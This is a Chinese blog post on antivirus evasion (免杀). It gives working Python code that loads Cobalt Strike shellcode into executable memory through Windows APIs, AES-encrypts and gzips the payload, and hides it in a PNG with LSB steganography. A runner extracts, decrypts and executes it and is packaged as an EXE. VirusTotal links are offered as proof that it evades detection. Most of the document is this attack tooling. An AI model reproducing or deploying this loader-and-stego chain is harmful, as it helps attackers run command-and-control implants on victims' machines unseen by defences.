记录一个免杀思路

主要思路

AST抽象语法树+图片隐写

思路以及部分代码来源
https://github.com/RobinDavid/LSB-Steganography
https://unsafe.sh/go-167427.html

shellcode

选择的是CS4.7 的python shellcode，忘了是32还是64了，无关紧要。

执行代码模板

手动把生成的shellcode替换到buf参数中，前面的 b 不要删了

# code
# coding=utf-8
from ctypes import c_int,c_uint64,windll,c_char,pointer


def py3loader2(para):
        para = bytearray(para)
        windll.kernel32.VirtualAlloc.restype = c_uint64
        ptr = windll.kernel32.VirtualAlloc(
                c_int(0),
                c_int(len(para)),
                c_int(0x3000),
                c_int(0x40)
        )
        buf = (c_char * len(para)).from_buffer(para)
        windll.kernel32.RtlMoveMemory(
                c_uint64(ptr),
                buf,
                c_int(len(para))
        )
        handle = windll.kernel32.CreateThread(
                c_int(0),
                c_int(0),
                c_uint64(ptr),
                c_int(0),
                c_int(0),
                pointer(c_int(0))
        )
        windll.kernel32.WaitForSingleObject(
                c_int(handle),
                c_int(-1)
        )

buf = b'\x4d\x5a\x41\x52\x55\x48\x89\xe5\x48\x81\xec\x20\x00\x00\x00\x48\x8d\x1d\xea\xff\xff\xff\x48\x89\xdf\x48\x81\xc3\x3c\x6e\x01\x00\xff\xd3\x41\xb8\xf0\xb5\xa2\x56\x68\x04\x00\x00\x00\x5a\x48\x89\xf9\xff\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a\x24\x00\x00\x00\x00'

py3loader2(buf)

生成器

负责生成隐写的图片和aes加密后的代码（这部分没什么用）。被隐写的图片只能用png类型，而且还不能太小，需要有一定的冗余空间。几kb那种肯定不行的，具体多少我也没测试，随手截了一张壁纸。

其中用到了aes加密，需要自己设置好key和iv，启动的时候需要用的

# generate.py
import gzip
from Crypto.Cipher import AES
from Crypto.Util import Padding

import cv2
import docopt
import numpy as np


class SteganographyException(Exception):
    pass


class LSBSteg():
    def __init__(self, im):
        self.image = im
        self.height, self.width, self.nbchannels = im.shape
        self.size = self.width * self.height
        
        self.maskONEValues = [1,2,4,8,16,32,64,128]
        #Mask used to put one ex:1->00000001, 2->00000010 .. associated with OR bitwise
        self.maskONE = self.maskONEValues.pop(0) #Will be used to do bitwise operations
        
        self.maskZEROValues = [254,253,251,247,239,223,191,127]
        #Mak used to put zero ex:254->11111110, 253->11111101 .. associated with AND bitwise
        self.maskZERO = self.maskZEROValues.pop(0)
        
        self.curwidth = 0  # Current width position
        self.curheight = 0 # Current height position
        self.curchan = 0   # Current channel position

    def put_binary_value(self, bits): #Put the bits in the image
        for c in bits:
            val = list(self.image[self.curheight,self.curwidth]) #Get the pixel value as a list
            if int(c) == 1:
                val[self.curchan] = int(val[self.curchan]) | self.maskONE #OR with maskONE
            else:
                val[self.curchan] = int(val[self.curchan]) & self.maskZERO #AND with maskZERO
                
            self.image[self.curheight,self.curwidth] = tuple(val)
            self.next_slot() #Move "cursor" to the next space
        
    def next_slot(self):#Move to the next slot were information can be taken or put
        if self.curchan == self.nbchannels-1: #Next Space is the following channel
            self.curchan = 0
            if self.curwidth == self.width-1: #Or the first channel of the next pixel of the same line
                self.curwidth = 0
                if self.curheight == self.height-1:#Or the first channel of the first pixel of the next line
                    self.curheight = 0
                    if self.maskONE == 128: #Mask 1000000, so the last mask
                        raise SteganographyException("No available slot remaining (image filled)")
                    else: #Or instead of using the first bit start using the second and so on..
                        self.maskONE = self.maskONEValues.pop(0)
                        self.maskZERO = self.maskZEROValues.pop(0)
                else:
                    self.curheight +=1
            else:
                self.curwidth +=1
        else:
            self.curchan +=1

    def read_bit(self): #Read a single bit int the image
        val = self.image[self.curheight,self.curwidth][self.curchan]
        val = int(val) & self.maskONE
        self.next_slot()
        if val > 0:
            return "1"
        else:
            return "0"
    
    def read_byte(self):
        return self.read_bits(8)
    
    def read_bits(self, nb): #Read the given number of bits
        bits = ""
        for i in range(nb):
            bits += self.read_bit()
        return bits

    def byteValue(self, val):
        return self.binary_value(val, 8)
        
    def binary_value(self, val, bitsize): #Return the binary value of an int as a byte
        binval = bin(val)[2:]
        if len(binval) > bitsize:
            raise SteganographyException("binary value larger than the expected size")
        while len(binval) < bitsize:
            binval = "0"+binval
        return binval

    def encode_text(self, txt):
        l = len(txt)
        binl = self.binary_value(l, 16) #Length coded on 2 bytes so the text size can be up to 65536 bytes long
        self.put_binary_value(binl) #Put text length coded on 4 bytes
        for char in txt: #And put all the chars
            c = ord(char)
            self.put_binary_value(self.byteValue(c))
        return self.image
       
    def decode_text(self):
        ls = self.read_bits(16) #Read the text size in bytes
        l = int(ls,2)
        i = 0
        unhideTxt = ""
        while i < l: #Read all bytes of the text
            tmp = self.read_byte() #So one byte
            i += 1
            unhideTxt += chr(int(tmp,2)) #Every chars concatenated to str
        return unhideTxt

    def encode_image(self, imtohide):
        w = imtohide.width
        h = imtohide.height
        if self.width*self.height*self.nbchannels < w*h*imtohide.channels:
            raise SteganographyException("Carrier image not big enough to hold all the datas to steganography")
        binw = self.binary_value(w, 16) #Width coded on to byte so width up to 65536
        binh = self.binary_value(h, 16)
        self.put_binary_value(binw) #Put width
        self.put_binary_value(binh) #Put height
        for h in range(imtohide.height): #Iterate the hole image to put every pixel values
            for w in range(imtohide.width):
                for chan in range(imtohide.channels):
                    val = imtohide[h,w][chan]
                    self.put_binary_value(self.byteValue(int(val)))
        return self.image

                    
    def decode_image(self):
        width = int(self.read_bits(16),2) #Read 16bits and convert it in int
        height = int(self.read_bits(16),2)
        unhideimg = np.zeros((width,height, 3), np.uint8) #Create an image in which we will put all the pixels read
        for h in range(height):
            for w in range(width):
                for chan in range(unhideimg.channels):
                    val = list(unhideimg[h,w])
                    val[chan] = int(self.read_byte(),2) #Read the value
                    unhideimg[h,w] = tuple(val)
        return unhideimg
    
    def encode_binary(self, data):
        l = len(data)
        if self.width*self.height*self.nbchannels < l+64:
            raise SteganographyException("Carrier image not big enough to hold all the datas to steganography")
        self.put_binary_value(self.binary_value(l, 64))
        for byte in data:
            byte = byte if isinstance(byte, int) else ord(byte) # Compat py2/py3
            self.put_binary_value(self.byteValue(byte))
        return self.image

    def decode_binary(self):
        l = int(self.read_bits(64), 2)
        output = b""
        for i in range(l):
            output += bytearray([int(self.read_byte(),2)])
        return output



def encrypt_shellcode(payload,key,iv):
    # 读取shellcode

    with open(payload,'rb')as f:
        shellcode = f.read()
    print("The file length is ",len(shellcode))

    # 压缩shellcode
    gzip_shellcode = gzip.compress(shellcode)


    # 对明文进行 PKCS#7 填充
    gzip_pad_shellcode = Padding.pad(gzip_shellcode, AES.block_size)


    # 将字符串转为字节类型并填充至合适的长度
    key = Padding.pad(key.encode(), AES.block_size)
    iv = Padding.pad(iv.encode(), AES.block_size)


    # 创建 AES 加密器对象,使用CBC模式
    aes_encrypt = AES.new(key, AES.MODE_CBC, iv)


    # 加密压缩后的明文
    ciphertext = aes_encrypt.encrypt(gzip_pad_shellcode)


    # 写入shellcode到文件中
    output = payload+"_aes"
    with open(output,'wb')as f:
        f.write(ciphertext)
        print("write:",output," ok")
    return ciphertext

def LSB(ciphertext,img):
    # 压缩密文
    gzip_compress = gzip.compress(ciphertext)
    print("The gzip_compress length is ",len(gzip_compress))

    # 读取图片
    im = cv2.imread(img)
    steg = LSBSteg(im)
    img_bin = steg.encode_binary(gzip_compress)
    output = img.replace(".png","_LSB.png")
    cv2.imwrite(output,img_bin)
    print("write:",output," ok")
    


key = 'this_is_y'
iv = '2317'
payload = r'E:\4_Code\AST_bypass\demo2\code'
img = r"E:\4_Code\AST_bypass\demo2\1.png"


ciphertext = encrypt_shellcode(payload,key,iv)
LSB(ciphertext,img)

图片对比，左边原图，右边隐写后的图。肉眼看基本没差别

运行代码

负责运行的代码,这块代码需要打包成exe

# run.py
from cv2 import imread
from gzip import decompress
from Crypto.Cipher import AES
from Crypto.Util import Padding
from sys import argv

class SteganographyException(Exception):
    pass

class LSBSteg():
    def __init__(self, im):
        self.image = im
        self.height, self.width, self.nbchannels = im.shape
        self.size = self.width * self.height
        
        self.maskONEValues = [1,2,4,8,16,32,64,128]
        #Mask used to put one ex:1->00000001, 2->00000010 .. associated with OR bitwise
        self.maskONE = self.maskONEValues.pop(0) #Will be used to do bitwise operations
        
        self.maskZEROValues = [254,253,251,247,239,223,191,127]
        #Mak used to put zero ex:254->11111110, 253->11111101 .. associated with AND bitwise
        self.maskZERO = self.maskZEROValues.pop(0)
        
        self.curwidth = 0  # Current width position
        self.curheight = 0 # Current height position
        self.curchan = 0   # Current channel position


    def next_slot(self):#Move to the next slot were information can be taken or put
        if self.curchan == self.nbchannels-1: #Next Space is the following channel
            self.curchan = 0
            if self.curwidth == self.width-1: #Or the first channel of the next pixel of the same line
                self.curwidth = 0
                if self.curheight == self.height-1:#Or the first channel of the first pixel of the next line
                    self.curheight = 0
                    if self.maskONE == 128: #Mask 1000000, so the last mask
                        raise SteganographyException("No available slot remaining (image filled)")
                    else: #Or instead of using the first bit start using the second and so on..
                        self.maskONE = self.maskONEValues.pop(0)
                        self.maskZERO = self.maskZEROValues.pop(0)
                else:
                    self.curheight +=1
            else:
                self.curwidth +=1
        else:
            self.curchan +=1

    def read_bit(self): #Read a single bit int the image
        val = self.image[self.curheight,self.curwidth][self.curchan]
        val = int(val) & self.maskONE
        self.next_slot()
        if val > 0:
            return "1"
        else:
            return "0"
    
    def read_byte(self):
        return self.read_bits(8)
    
    def read_bits(self, nb): #Read the given number of bits
        bits = ""
        for i in range(nb):
            bits += self.read_bit()
        return bits

    def decode_binary(self):
        l = int(self.read_bits(64), 2)
        output = b""
        for i in range(l):
            output += bytearray([int(self.read_byte(),2)])
        return output




def decrypt_shellcode(ciphertext,key,iv):
    # 读取加密后的shellcode

    # with open("aes_payload",'rb')as f:
    #     ciphertext = f.read()


    # 设置key和iv
    # key = 'this_is_y'
    # iv = '2317'


    # 将字符串转为字节类型并填充至合适的长度
    key = Padding.pad(key.encode(), AES.block_size)
    iv = Padding.pad(iv.encode(), AES.block_size)


    # 创建 AES 加密器对象,使用CBC模式
    aes_decrypt = AES.new(key, AES.MODE_CBC, iv)


    # 加密压缩后的明文
    plaintext = aes_decrypt.decrypt(ciphertext)


    # 对解密后的填充数据进行 PKCS#7 反填充
    plaintext = Padding.unpad(plaintext, AES.block_size)


    # 解压明文
    shellcode = decompress(plaintext)

    # with open("code_decrypt",'wb')as f:
    #     f.write(shellcode)
    return shellcode



if len(argv) != 4:
    exit(0)

payload = argv[1]
key = argv[2]
iv = argv[3]

im_bin = imread(payload)
steg = LSBSteg(im_bin)
bin = steg.decode_binary()

# 获取到代码，解密出来，使用ast运行

data = gzip.decompress(bin)
code = decrypt_shellcode(data,key,iv)
run_code = compile(code,'<string>','exec')
exec(run_code)

• pyinstaller -F -w .\run.py
• run.exe 图片路径 key iv

效果

https://www.virustotal.com/gui/file/e9fa4eba8cf713d7e7a2195f83523b173aa7a050952f92561d6989c55320601c?nocache=1

https://www.virustotal.com/gui/file/9ef00644d18c3fb23148c2382cea47dba25ff4029e33025d35e660e1e1096473?nocache=1

最后

最后有一个相对蛋疼的事情。打包出来的居然有50MB。

我突然就想到了当初为什么不用python做免杀了